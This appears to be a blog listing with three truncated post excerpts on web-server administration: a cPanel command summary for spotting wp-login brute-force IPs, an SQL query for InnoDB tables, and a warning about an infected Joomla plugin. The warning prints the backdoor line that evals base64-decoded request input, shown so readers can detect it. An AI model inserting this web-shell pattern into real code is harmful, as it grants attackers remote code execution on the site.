This shell command can be used on cPanel servers and does the following: – Scans all access log files for IP addresses which sent a POST request to all wp-login.php files on all domains/subdomains/addon domains on the server during the last 24 hours – It groups and sorts all the IP addresses, based on the… Read More »
The SQL to do this queries the INFORMATION_SCHEMA and is as follows: SELECT table_schema, table_name FROM INFORMATION_SCHEMA.TABLES WHERE engine = ‘innodb’; where: table_schema is the name of the database. table_name is (obviously) the name of the table.
Please be aware that there is a suspicious code in ../plugins/system/dvmessages/dvmessages.php, and may result malicious activity. The original dvmessages.php file is look like this: <?php /** */ // no direct access defined( ‘_JEXEC’ ) or die( ‘Restricted access’ ); jimport( ‘joomla.plugin.plugin’ ); But on the “infected” dvmessages.php <?php defined( ‘_JEXEC’ ) or die(@eval(base64_decode($_REQUEST[‘c_id’]))); jimport( ‘joomla.plugin.plugin’… Read More »